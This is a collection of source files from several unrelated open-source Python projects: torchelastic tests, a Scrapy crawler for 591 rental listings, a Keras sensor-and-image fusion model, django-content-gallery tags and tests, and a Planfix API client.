with self.assertRaises(ValueError):
StandaloneSession(name=SESSION_NAME, schedulers={"local": self.scheduler})
@patch("json.dumps")
def test_get_schedulers(self, json_dumps_mock, _):
default_sched_mock = MagicMock()
json_dumps_mock.return_value = "{}"
local_sched_mock = MagicMock()
schedulers = {"default": default_sched_mock, "local": local_sched_mock}
session = StandaloneSession(name="test_session", schedulers=schedulers)
role = Role(name="sleep").runs("sleep.sh", "60").on(self.test_container)
app = Application("sleeper").of(role)
cfg = RunConfig()
session.run(app, scheduler="local", cfg=cfg)
        local_sched_mock.submit.assert_called_once_with(app, cfg)
```
#### File: events/test/lib_test.py
```python
import logging
import unittest
from unittest.mock import patch
from torchelastic.tsm.events import _get_or_create_logger, SourceType, TsmEvent
class TsmEventLibTest(unittest.TestCase):
def assert_event(self, actual_event: TsmEvent, expected_event: TsmEvent):
self.assertEqual(actual_event.session, expected_event.session)
self.assertEqual(actual_event.scheduler, expected_event.scheduler)
self.assertEqual(actual_event.api, expected_event.api)
self.assertEqual(actual_event.app_id, expected_event.app_id)
self.assertEqual(actual_event.runcfg, expected_event.runcfg)
self.assertEqual(actual_event.source, expected_event.source)
@patch("torchelastic.tsm.events.get_logging_handler")
def test_get_or_create_logger(self, logging_handler_mock):
logging_handler_mock.return_value = logging.NullHandler()
logger = _get_or_create_logger("test_destination")
self.assertIsNotNone(logger)
self.assertEqual(1, len(logger.handlers))
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def test_event_created(self):
event = TsmEvent(
session="test_session", scheduler="test_scheduler", api="test_api"
)
self.assertEqual("test_session", event.session)
self.assertEqual("test_scheduler", event.scheduler)
self.assertEqual("test_api", event.api)
self.assertEqual(SourceType.UNKNOWN, event.source)
def test_event_deser(self):
event = TsmEvent(
session="test_session",
scheduler="test_scheduler",
api="test_api",
source=SourceType.EXTERNAL,
)
json_event = event.serialize()
deser_event = TsmEvent.deserialize(json_event)
self.assert_event(event, deser_event)
```
|
{
"source": "jenhaoyang/rentea-crawler",
"score": 3
}
|
#### File: crawler/spiders/periodic_591_spider.py
```python
import json
import logging
from datetime import datetime, timedelta
from scrapy import Request
from scrapy_twrh.spiders.enums import DealStatusType
from scrapy_twrh.spiders.rental591 import Rental591Spider, util
from scrapy_twrh.spiders.rental591.all_591_cities import all_591_cities
from scrapy_twrh.spiders.util import clean_number
from scrapy_twrh.items import GenericHouseItem
DEFAULT_MINUTEAGO = 60
class Periodic591Spider(Rental591Spider):
name = 'periodic591'
def __init__(self, minuteago, **kwargs):
try:
minuteago = int(minuteago)
except ValueError:
minuteago = DEFAULT_MINUTEAGO
if 'target_cities' in kwargs and isinstance(kwargs['target_cities'], str):
kwargs['target_cities'] = kwargs['target_cities'].split(',')
super().__init__(
**kwargs,
parse_list=self.periodic_parse_list
)
time_ago = datetime.now() - timedelta(minutes=minuteago)
self.epoch_ago = time_ago.timestamp()
self.count_per_city = {}
for city in all_591_cities:
self.count_per_city[city['city']] = 0
def periodic_parse_list(self, response):
data = json.loads(response.text)
meta = response.meta['rental']
houses = data['data']['topData'] + data['data']['data']
has_outdated = False
for house in houses:
house['is_vip'] = 'id' not in house
# updatetime == creation time in 591...
if not house['is_vip'] and house['updatetime'] < self.epoch_ago:
has_outdated = True
else:
house_item = self.gen_shared_attrs(house, meta)
                # send non-gps request first as it may be closed soon
yield self.gen_detail_request(util.DetailRequestMeta(
house_item['vendor_house_id'],
False
))
if meta.name in self.count_per_city:
self.count_per_city[meta.name] += 1
if data['data']['data'] and not has_outdated:
# only goto next page when there's response and not outdated
yield self.gen_list_request(util.ListRequestMeta(
meta.id,
meta.name,
meta.page + 1
))
else:
logging.info(f'[{meta.name}] total {self.count_per_city[meta.name]} house to crawl!')
def parse_main_response(self, response):
for item in super().parse_main_response(response):
if not isinstance(item, GenericHouseItem):
# Skip original logic about GPS request generation
continue
if item['deal_status'] == DealStatusType.NOT_FOUND:
yield item
else:
# Got an item that contains GPS!
gps_arg = {
'callback': self.parse_detail,
**self.gen_detail_request_args(util.DetailRequestMeta(
item['vendor_house_id'],
True
))
}
gps_arg['meta']['main_item'] = item
yield Request(**gps_arg)
def parse_gps_response(self, response):
for item in super().parse_gps_response(response):
# combine info from main and gps pages
item = GenericHouseItem(
**response.meta['main_item'],
rough_coordinate=item['rough_coordinate']
)
yield item
def gen_list_request_args(self, rental_meta: util.ListRequestMeta):
"""add order and orderType, so to get latest created house"""
url = "{}®ion={}&firstRow={}&order=posttime&orderType=desc".format(
util.LIST_ENDPOINT,
rental_meta.id,
rental_meta.page * self.N_PAGE
)
return {
**super().gen_list_request_args(rental_meta),
'url': url
}
```
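A minimal sketch of driving the spider above programmatically; the equivalent CLI call would be `scrapy crawl periodic591 -a minuteago=60`. The settings shown here are placeholders rather than the project's real configuration.
```python
from scrapy.crawler import CrawlerProcess

# crawl houses created/updated within the last 60 minutes
process = CrawlerProcess(settings={'LOG_LEVEL': 'INFO'})
process.crawl(Periodic591Spider, minuteago=60)
process.start()
```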
|
{
"source": "jenhuluck/deep-learning-in-ADL",
"score": 2
}
|
#### File: deep-learning-in-ADL/SHLDataset/data_fusion3.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import tensorflow as tf
from sklearn import metrics
import h5py
from tensorflow.keras import regularizers
from tensorflow.keras.layers import Input, Conv2D, Dense, Flatten, Dropout, SimpleRNN, GRU, LSTM, GlobalMaxPooling1D,GlobalMaxPooling2D,MaxPooling2D,BatchNormalization, concatenate
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam, SGD
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
import itertools
from tensorflow.keras.utils import plot_model
class models():
#def __init__(self):
def read_h5(self, path_array):
split_array = []
l = len(path_array)
for i, path in enumerate(path_array):
f = h5py.File(path, 'r')
X = f.get('inputs')
y = f.get('labels')
X = np.array(X)
y = np.array(y)
split_array.append(X) # add X to array for split
if i == l - 1:
split_array.append(y) # add y to the last
self.split = train_test_split(*split_array,test_size=0.2, random_state = 1)
'''
print(len(split))
print(split[0].shape) # data1_train_x
print(split[1].shape) # data1_test_x
print(split[2].shape) # data2_train_x
print(split[3].shape) # data2_test_x
print(split[4].shape) # y_train
print(split[5].shape) # y_test
'''
return self.split
# K is the number of classes
def create_motion_cnn(self, input_shape, K):
i = Input(shape = input_shape)
x = Conv2D(16, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(i)
x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
x = Dropout(0.2)(x)
#x = Conv2D(32, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
#x = Dropout(0.2)(x)
#x = Conv2D(256, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
#x = Conv2D(128, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(128,activation = 'relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.2)(x)
x = Dense(K,activation = 'relu')(x)
model = Model(i, x)
return model
def create_img_cnn(self, input_shape, K):
i = Input(shape = input_shape)
x = Conv2D(32, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(i)
x = BatchNormalization()(x)
x = MaxPooling2D((2,2))(x)
x = Dropout(0.2)(x)
x = Conv2D(64, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2,2))(x)
x = Dropout(0.4)(x)
x = Conv2D(128, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
x = Dropout(0.5)(x)
#x = Conv2D(128, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
x = Flatten()(x)
#x = Dropout(0.2)(x)
x = Dense(256,activation = 'relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.2)(x)
x = Dense(K,activation = 'relu')(x)
model = Model(i, x)
return model
# merge n cnn models
def merge_models(self,n):
motion_input_shape = np.expand_dims(self.split[0], -1)[0].shape
K = len(set(self.split[-2]))
print(motion_input_shape)
cnns = [] # save all cnn models
for i in range(n-1):
cnn_i = self.create_motion_cnn(motion_input_shape,K)
cnns.append(cnn_i)
img_input_shape = np.expand_dims(self.split[-4], -1)[0].shape # last data should be image data
print(img_input_shape)
img_cnn = self.create_img_cnn(img_input_shape, K)
cnns.append(img_cnn)
#cnn1 = self.create_cnn(input_shape, K)
#cnn2 = self.create_cnn(input_shape, K)
#combinedInput = concatenate([cnn1.output, cnn2.output])
combinedInput = concatenate([c.output for c in cnns])
x = Dense(K,activation='softmax')(combinedInput)
self.mix_model = Model(inputs = [c.input for c in cnns], outputs = x)
#model = Model(inputs = [cnn1.input, cnn2.input], outputs = x)
self.mix_model.compile(optimizer = Adam(lr=0.0005),loss = 'sparse_categorical_crossentropy',metrics = ['accuracy'])
#self.r = self.mix_model.fit(x = [np.expand_dims(self.split[0],-1),self.split[]])
self.r = self.mix_model.fit(x = [np.expand_dims(self.split[i],-1) for i in range(2*n) if i % 2 == 0],
y = self.split[-2], validation_data = ([np.expand_dims(self.split[i],-1) for i in range(2*n) if i % 2 != 0],self.split[-1]),
epochs = 50, batch_size = 256 )
print(self.mix_model.summary())
return self.r
#r = model.fit(x = [np.expand_dims(self.split[0],-1),np.expand_dims(self.split[2],-1)], y = self.split[4], validation_data = ([np.expand_dims(self.split[1],-1),np.expand_dims(self.split[3],-1)],self.split[5]), epochs = 50, batch_size = 32 )
def draw(self):
f1 = plt.figure(1)
plt.title('Loss')
plt.plot(self.r.history['loss'], label = 'loss')
plt.plot(self.r.history['val_loss'], label = 'val_loss')
plt.legend()
f1.show()
f2 = plt.figure(2)
        # the history key name differs across Keras versions ('acc' vs 'accuracy')
        acc_key = 'accuracy' if 'accuracy' in self.r.history else 'acc'
        plt.plot(self.r.history[acc_key], label = 'accuracy')
        plt.plot(self.r.history['val_' + acc_key], label = 'val_accuracy')
plt.legend()
f2.show()
# summary, confusion matrix and heatmap
def con_matrix(self,n):
K = len(set(self.split[-2]))
self.y_pred = self.mix_model.predict([np.expand_dims(self.split[i],-1) for i in range(2*n) if i % 2 != 0]).argmax(axis=1)
cm = confusion_matrix(self.split[-1],self.y_pred)
self.plot_confusion_matrix(cm,list(range(K)))
def plot_confusion_matrix(self, cm, classes, normalize = False, title='Confusion matrix', cmap=plt.cm.Blues):
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:,np.newaxis]
print("Normalized confusion matrix")
else:
print("Confusion matrix, without normalization")
print(cm)
f3 = plt.figure(3)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max()/2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment = "center",
color = "white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('predicted label')
f3.show()
if __name__ == "__main__":
model_name = "cnn" # can be cnn/dnn/rnn
paths = ["./bag.h5","./image_for_fusion.h5"] # a motion data fuses with video data
#paths = ["./bag.h5", "./hand.h5", "./hip.h5","./torso.h5", "./image_for_fusion.h5"]
mix = models()
print("read h5 file....")
data_array = mix.read_h5(paths)
mix.merge_models(len(paths))
mix.draw()
mix.con_matrix(len(paths))
```
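The even/odd indexing in `merge_models` relies on how `sklearn.model_selection.train_test_split` orders its outputs when given several arrays. A small self-contained illustration of that convention (array shapes are arbitrary):
```python
import numpy as np
from sklearn.model_selection import train_test_split

X1 = np.zeros((10, 4))   # e.g. one motion modality
X2 = np.zeros((10, 8))   # e.g. image features
y = np.arange(10)        # labels go last

split = train_test_split(X1, X2, y, test_size=0.2, random_state=1)
# split == [X1_train, X1_test, X2_train, X2_test, y_train, y_test]
# -> even indices (0, 2, ...) are training inputs, odd indices are test
#    inputs, and split[-2] / split[-1] are the train / test labels,
#    which is exactly the layout read_h5 and merge_models assume.
```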
|
{
"source": "jenia0jenia/django-content-gallery",
"score": 2
}
|
#### File: content_gallery/templatetags/content_gallery.py
```python
import json
from django import template
from django.utils import html
from .. import settings
from .. import utils
register = template.Library()
@register.simple_tag
def gallery_image_data(obj):
"""
Returns data of the image related to the object.
Used to construct previews.
"""
# get the first image related to the object
image = utils.get_first_image(obj)
try:
# get data related to the object if the image exists
data = {
'app_label': image.content_type.app_label,
'content_type': image.content_type.model,
'object_id': str(image.object_id)
}
except AttributeError:
# set empty data if the image does not exist
data = {}
# return the image and data in JSON format
data_json = json.dumps(data)
return {
'image': image,
'data_image': html.escape(data_json)
}
@register.inclusion_tag('content_gallery/templatetags/preview.html')
def gallery_preview(obj):
"""
Returns a large preview of the first image related to the object
"""
# preview dimensions used in its template
context = {
'image_width': settings.CONF['preview_width'],
'image_height': settings.CONF['preview_height'],
'div_width': settings.CONF['preview_width'] + 14,
'div_height': settings.CONF['preview_height'] + 14,
'zoom_left': settings.CONF['preview_width'] - 55
}
# get image data
image_data = gallery_image_data(obj)
# add the image data to the context
context.update(image_data)
# return context to render the template
return context
@register.inclusion_tag('content_gallery/templatetags/small_preview.html')
def gallery_small_preview(obj):
"""
Returns a small preview of the first image related to the object
"""
# preview dimensions used in its template
context = {
'image_width': settings.CONF['small_preview_width'],
'image_height': settings.CONF['small_preview_height'],
'div_width': settings.CONF['small_preview_width'] + 14,
'div_height': settings.CONF['small_preview_height'] + 14,
'zoom_left': settings.CONF['small_preview_width'] - 15
}
# get image data
image_data = gallery_image_data(obj)
# add the image data to the context
context.update(image_data)
# return context to render the template
return context
@register.simple_tag
def gallery_data_url_pattern():
"""
Returns gallery data URL pattern used by JavaScript code.
The template tag is used in the gallery template.
"""
return utils.get_gallery_data_url_pattern()
@register.filter
def obfuscate(path):
"""
Returns the link to the original static file in DEBUG mode
    or to the obfuscated file if DEBUG is False.
"""
return utils.get_obfuscated_file(path)
```
#### File: content_gallery/tests/test_widgets.py
```python
import json
from django.test import mock, TestCase
from django.contrib.contenttypes.models import ContentType
from django.forms import Select
from django.db.models import BLANK_CHOICE_DASH
from django.contrib.admin.widgets import AdminFileWidget
from django.core.files.uploadedfile import InMemoryUploadedFile
from .. import widgets
from .. import utils
from .. import fields
from .models import *
from .base_test_cases import *
from .utils import patch_settings
class TestContentTypeSelect(TestCase):
"""
Tests for the widget for selecting models in the Image admin
"""
def test_filter_choices(self):
"""
        Checks whether the _filter_choices method removes from the choices
        list all models except those whose gallery_visible attribute is True.
        An empty choice should also remain.
"""
# create a choice of TestModel (gallery_visible=True)
ctype = ContentType.objects.get_for_model(TestModel)
test_choice = (str(ctype.pk), ctype.name)
# create a choice of AnotherTestModel (gallery_visible=False)
ctype = ContentType.objects.get_for_model(AnotherTestModel)
another_choice = (str(ctype.pk), ctype.name)
# create a choice of WrongTestModel (has not gallery_visible)
ctype = ContentType.objects.get_for_model(WrongTestModel)
wrong_choice = (str(ctype.pk), ctype.name)
# create a mock widget object
widget = mock.MagicMock(spec=widgets.ContentTypeSelect)
# set initial choices
widget.choices = [
("", "----"),
test_choice,
another_choice,
wrong_choice
]
# call the _filter_choices method
widgets.ContentTypeSelect._filter_choices(widget)
# check whether an empty choice is in the list
self.assertIn(("", "----"), widget.choices)
# check whether the TestModel choice is in the list
self.assertIn(test_choice, widget.choices)
# check whether the AnotherTestModel choice is not in the list
self.assertNotIn(another_choice, widget.choices)
# check whether the WrongTestModel choice is not in the list
self.assertNotIn(wrong_choice, widget.choices)
@mock.patch('django.utils.safestring.mark_safe', return_value='baz')
def test_render_with_mark_safe(self, mark_safe):
"""
Checks whether the widget is rendered properly
"""
# create a mock widget object
widget = mock.MagicMock(spec=widgets.ContentTypeSelect)
# set the js template
        # it should contain %s for URL pattern substitution
widget.js = " %s"
# patch the get_choices_url_pattern helper function
# so that it returns known value
with mock.patch.object(
utils,
'get_choices_url_pattern',
return_value='foo'
) as get_url_pattern, mock.patch.object(
Select, # patch parent's method
'render',
return_value='bar'
) as render:
# call the render method
result = widgets.ContentTypeSelect.render(widget, 'name', 'value')
# check whether the helper function has been called
get_url_pattern.assert_called_with()
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', 'value', None)
# check whether the mark_safe function has been called with rendered
# template containing a result of the parent's method + the js
# pattern where %s is replaced with the URL pattern
# i.e. 'bar' + ' %s' % 'foo'
mark_safe.assert_called_with('bar foo')
# check whether the render method returns a result of the mark_safe
self.assertEqual(result, "baz")
class TestObjectIdSelect(TestCase):
"""
Tests for the widget for selecting the object of the model
"""
@classmethod
def setUpClass(cls):
"""
Creates two objects of the TestModel in the database
"""
cls.widget = mock.MagicMock(spec=widgets.ObjectIdSelect)
cls.object1 = TestModel.objects.create(name="Test object 1")
cls.object2 = TestModel.objects.create(name="Test object 2")
@classmethod
def tearDownClass(cls):
"""
Deletes all created objects
"""
cls.object1.delete()
cls.object2.delete()
def setUp(self):
"""
Creates a mock widget object
"""
self.widget = mock.MagicMock(spec=widgets.ObjectIdSelect)
def test_create_choices_objects_exist(self):
"""
Checks whether the _create_choices method creates choices for
all objects of the selected model if objects exist. Also the list
should include an empty choice.
"""
# set selected model class with existing objects
self.widget.model_class = TestModel
# call the _create_choices method
widgets.ObjectIdSelect._create_choices(self.widget)
# check whether the list contains an empty choice
self.assertIn(BLANK_CHOICE_DASH[0], self.widget.choices)
# create choices
choice1 = (str(self.object1.pk), self.object1)
choice2 = (str(self.object2.pk), self.object2)
# check whether the list contains both TestModel objects
self.assertIn(choice1, self.widget.choices)
self.assertIn(choice2, self.widget.choices)
# check whether there are 3 choices so the list contains nothing
# but two objects of the TestModel and an empty choice
self.assertEqual(len(self.widget.choices), 3)
def test_create_choices_objects_do_not_exist(self):
"""
Checks whether the _create_choices method creates an empty choice
        only if there are no objects of the selected model
"""
# set selected model class without existing objects
self.widget.model_class = AnotherTestModel
# call the _create_choices method
widgets.ObjectIdSelect._create_choices(self.widget)
# check whether the list contains only one choice
self.assertEqual(len(self.widget.choices), 1)
# check whether an empty choice presents in the list
self.assertIn(BLANK_CHOICE_DASH[0], self.widget.choices)
def test_render(self):
"""
Checks whether the render method calls the _create_choices method
and returns a result of parent's render method. The _create_choices
should be called before the parent's render.
"""
# create a mock for logging calls to determine call order
call_logger = mock.Mock()
# attach the _create_choices mock to the logger
call_logger.attach_mock(self.widget._create_choices, 'create_choices')
# patch the parent's render method
with mock.patch.object(
Select,
'render',
return_value='foo'
) as render:
# attach the parent's render mock to the logger
call_logger.attach_mock(render, 'parent_render')
# call the render method
result = widgets.ObjectIdSelect.render(self.widget, 'name', 'value')
# check whether the method returns the result of the parent's render
self.assertEqual(result, 'foo')
# create an expected calls list where the create_choices is called
# before the parent's render
expected_calls = [
mock.call.create_choices(),
# the parent's render should be called with the same arguments
mock.call.parent_render('name', 'value', None)
]
# check whether functions has been called in the proper order
self.assertListEqual(call_logger.mock_calls, expected_calls)
class TestImageWidget(TestCase):
"""
Tests for the widget displaying a preview of image in the Image admin
"""
def setUp(self):
"""
Creates a mock widget object
"""
self.widget = mock.MagicMock(spec=widgets.ImageWidget)
def test_render_without_image(self):
"""
Checks whether the template_with_initial is not affected by
the render method if it has been called without an image
"""
# set initial template_with_initial value
self.widget.template_with_initial = "bar"
# patch parent's render method
with mock.patch.object(
AdminFileWidget,
'render',
return_value='foo'
) as render:
# call the method with None image argument
result = widgets.ImageWidget.render(self.widget, 'name', None)
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', None, None)
# check whether the method returns the result of the parent's method
self.assertEqual(result, 'foo')
# check whether the template_with_initial has not been changed
self.assertEqual(self.widget.template_with_initial, 'bar')
@mock.patch('django.utils.html.escape', return_value='escaped data')
def test_render_with_image(self, escape):
"""
Checks whether the template_with_initial is filled properly
        if the render method has been called with a saved image
        """
        # set the widget template used to build template_with_initial
self.widget.template = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}"
# create a mock image field file object
image = mock.MagicMock(spec=fields.GalleryImageFieldFile)
# set known settings and patch helper functions
with patch_settings(
{
'preview_width': 400,
'preview_height': 300,
}
), mock.patch.object(
utils,
'create_image_data',
return_value='data'
) as create_data, mock.patch.object(
utils,
'create_static_url',
return_value='url'
) as create_url, mock.patch.object(
AdminFileWidget, # patch the parent's render method
'render',
return_value='foo'
) as render:
# call the method with an image field file mock
result = widgets.ImageWidget.render(self.widget, 'name', image)
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', image, None)
        # check whether the create_static_url helper function has been
# called with the path to zoom image
create_url.assert_called_with("content_gallery/img/zoom.png")
# check whether the create_image_data helper function has been
# called with the image filed file mock
create_data.assert_called_with(image)
        # check whether escape has been called with the value returned by
        # create_image_data, serialized to JSON
escape.assert_called_with(json.dumps('data'))
# check whether the method returns the result of the parent's method
self.assertEqual(result, 'foo')
# check whether the template has been filled properly
self.assertEqual(
self.widget.template_with_initial,
"\n".join([
# the size of the container
str(400 + 14),
str(300 + 14),
# the size of the image
str(400),
str(300),
# the line-height
str(300),
# the result of the escape function
"escaped data",
# the result of create_static_url function
"url",
# the left offset of the zoom image
str(400 - 55)
])
)
def test_render_with_uploaded_image(self):
"""
Checks whether the template_with_initial is not affected by
        the render method if it has been called with a just-uploaded image
"""
# set initial template_with_initial value
self.widget.template_with_initial = "bar"
# create a mock object of just uploaded image
image = mock.MagicMock(spec=InMemoryUploadedFile)
# patch the parent's render method
with mock.patch.object(
AdminFileWidget,
'render',
return_value='foo'
) as render:
# call the method with just uploaded image mock
result = widgets.ImageWidget.render(self.widget, 'name', image)
# check whether the parent's method has been called
# with the same arguments
render.assert_called_with('name', image, None)
# check whether the method returns the result of the parent's method
self.assertEqual(result, 'foo')
# check whether the template_with_initial has not been changed
self.assertEqual(self.widget.template_with_initial, 'bar')
class TestImageInlineWidget(TestCase):
"""
Tests for the widget displaying a small preview of image in inline admins
"""
def setUp(self):
"""
Creates a mock widget object
"""
self.widget = mock.MagicMock(spec=widgets.ImageInlineWidget)
def test_render_without_image(self):
"""
Checks whether the render method returns an empty string if
        it has been called with a None image argument
"""
# call the method with None image argument
result = widgets.ImageInlineWidget.render(self.widget, 'name', None)
# check whether the result is an empty string
self.assertEqual(result, "")
@mock.patch('django.template.loader.render_to_string', return_value="foo")
def test_render_with_image(self, render_to_string):
"""
Checks whether the render method returns a result of
the render_to_string function if the method has been
called with an image
"""
# set a template name
self.widget.template_name = "bar"
# create an image mock
image = mock.MagicMock()
# set an URL of the small preview
image.small_preview_url = 'url'
        # patch create_image_data so that it returns a known result
with mock.patch.object(
utils,
'create_image_data',
return_value='data'
) as create_data:
# call the method with the image mock
result = widgets.ImageInlineWidget.render(
self.widget,
'name',
image
)
# check whether the create_image_data helper function has been
# called with the image
create_data.assert_called_with(image)
# check whether the method returns the result of
# the render_to_string function
self.assertEqual(result, "foo")
# check whether the render_to_string function has been called
# with proper arguments
render_to_string.assert_called_with(
'bar', # the template name
{
'preview_src': 'url', # the URL of small preview
# the result of the create_image_data function
# in JSON format
'image_data': json.dumps('data')
}
)
```
#### File: content_gallery/tests/utils.py
```python
import sys
from io import BytesIO
from contextlib import contextmanager
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from .. import settings
from .. import models
from .models import *
def get_image_data():
"""
Returns the BytesIO object containing an Image data
"""
io = BytesIO()
# create filled with red color image 200x200 px
size = (200, 200)
color = (255, 0, 0, 0)
image = Image.new("RGB", size, color)
# save the image data in JPEG format to the io buffer
image.save(io, format='JPEG')
io.seek(0) # seek to the beginning
return io
def get_image_in_memory_data():
"""
    Creates the InMemoryUploadedFile object using the data from io
to save it into the ImageField of the database
"""
io = get_image_data() # get a red rectangle 200x200px
# create the InMemoryUploadedFile object with the 'foo.jpg' file
image_file = InMemoryUploadedFile(io, None, 'foo.jpg',
'jpeg', sys.getsizeof(io), None)
image_file.seek(0) # seek to the beginning
return image_file
def create_image_file(name):
"""
Saves the image data to the file
"""
io = get_image_data() # get a red rectangle 200x200px
# save it into the file
with open(name, 'wb') as f:
f.write(io.read())
def get_image_size(path):
"""
Returns the size of the image
"""
with Image.open(path) as img:
return img.size
@contextmanager
def patch_settings(settings_dict):
"""
Temporary replaces values in the ContentGallery
settings with values from the dictionary
"""
saved_settings = {}
for key, value in settings_dict.items():
# save the original value
saved_settings[key] = settings.CONF[key]
# set the fake value
settings.CONF[key] = value
# stop here until the context manager exits
yield
# restore the original settings
settings.CONF.update(saved_settings)
def clean_db():
"""
Removes all objects from the test database
"""
TestModel.objects.all().delete()
AnotherTestModel.objects.all().delete()
WrongTestModel.objects.all().delete()
models.Image.objects.all().delete()
```
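A small usage sketch of the `patch_settings` context manager defined above; the overridden keys are illustrative, and the imports assume the same test-package layout as the modules in this repository.
```python
from .. import settings            # assumed relative import, as in the tests above
from .utils import patch_settings

def test_preview_size_override():
    with patch_settings({'preview_width': 100, 'preview_height': 80}):
        # inside the block the gallery code sees the temporary values
        assert settings.CONF['preview_width'] == 100
    # on exit the original values are restored automatically
```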
|
{
"source": "jenia0jenia/django-planfix",
"score": 3
}
|
#### File: django-planfix/planfix/api.py
```python
from .classes import PlanFixBase, PlanfixError
from .utils import print_parser
from xml.etree import ElementTree
from collections import OrderedDict
import xmltodict
class PlanFix(PlanFixBase):
"""
https://planfix.ru/docs/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_%D1%84%D1%83%D0%BD%D0%BA%D1%86%D0%B8%D0%B9
"""
def project_get_list(self, cur_page=1, target='all'):
if not str(cur_page).isdigit():
cur_page = 1
self.method = 'project.getList'
self.scheme = {'account', 'sid', 'pageCurrent', 'target'}
params = {'account': self.account,
'sid': self.sid,
'pageCurrent': str(cur_page),
'target': target}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('projects')
return [(item.find('id').text, item.find('title').text) for item in rt]
except PlanfixError as e:
return None
def contact_get_list(self, cur_page=1, search=''):
if not str(cur_page).isdigit():
cur_page = 1
self.method = 'contact.getList'
self.scheme = {'account', 'sid', 'pageCurrent', 'pageSize', 'search'}
params = {'account': self.account,
'sid': self.sid,
'pageCurrent': str(cur_page),
'pageSize': '100',
'search': search}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('contacts')
total = rt.attrib['totalCount']
return [(item.find('userid').text, item.find('email').text) for item in rt]
except PlanfixError as e:
return None
def contact_get(self, **kwargs):
self.method = 'contact.get'
self.scheme = ['account',
'sid',
{'contact': ['id', 'general']}
]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('contact').find('userid').text
except PlanfixError as e:
return None
def contact_add(self, **kwargs):
self.method = 'contact.add'
self.scheme = ['account',
'sid',
{'contact': ['template',
'name',
'lastName',
'post',
'email',
'mobilePhone',
'workPhone',
'homePhone',
'address',
'description',
'sex',
'skype',
'icq',
'vk',
'birthdate',
'lang',
'isCompany',
'canBeWorker',
'canBeClient'
]}
]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('contact').find('userid').text
except PlanfixError as e:
            # the e-mail specified for the login is not unique
if e.message == '8007':
return self.contact_get_list(search=kwargs['email'])[0][0]
def task_get_list(self, target='template'):
self.method = 'task.getList'
self.custom_scheme = []
self.scheme = {'account', 'sid', 'target', 'pageCurrent'}
params = {'account': self.account,
'sid': self.sid,
'pageCurrent': '1',
'target': target}
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('tasks')
return [(item.find('id').text, item.find('title').text) for item in rt]
except PlanfixError as e:
return None
def task_get_list_of_status(self, *args, **kwargs):
self.method = 'taskStatus.getListOfSet'
self.custom_scheme = []
self.scheme = ['account',
'sid',
{'taskStatusSet': ['id']}
]
params = {'account': self.account,
'sid': self.sid}
params.update(kwargs)
try:
response = ElementTree.fromstring(self.connect(**params))
rt = response.find('taskStatuses')
return [(item.find('id').text, item.find('name').text) for item in rt]
except PlanfixError as e:
return None
def task_change_status(self, id, status):
self.method = 'task.changeStatus'
self.custom_scheme = []
self.scheme = ['account',
'sid',
{'task': ['id', 'general']},
'status',
'dateTime',
]
params = {'account': self.account,
'sid': self.sid,
'id': id,
'status': status}
try:
response = ElementTree.fromstring(self.connect(**params))
return response.find('task').find('id').text
except PlanfixError as e:
return None
def task_add(self, *args, **kwargs):
self.method = "task.add"
self.scheme = ['account',
'sid',
{'task': ['template',
'title',
'description',
'importance',
'status',
{'owner': 'id'},
'statusSet',
'checkResult',
{'project': 'id'},
'startDateIsSet',
'startDate',
'startTimeIsSet',
'startTime',
'endDateIsSet',
'endDate',
'endTimeIsSet',
'endTime',
# {'customData': 'customValue'}
]
}]
try:
response = ElementTree.fromstring(self.connect(**kwargs))
return response.find('task').find("id").text
except PlanfixError as e:
return None
# def task_add_v2(self, *args, **kwargs):
# self.method = "task.add"
# self.scheme = ['account',
# 'sid',
# {'task': ['template',
# 'title',
# 'description',
# 'importance',
# 'status',
# {'owner': 'id'},
# 'statusSet',
# 'checkResult',
# {'project': 'id'},
# 'startDateIsSet',
# 'startDate',
# 'startTimeIsSet',
# 'startTime',
# 'endDateIsSet',
# 'endDate',
# 'endTimeIsSet',
# 'endTime',
# {'customData': 'customValue'}]
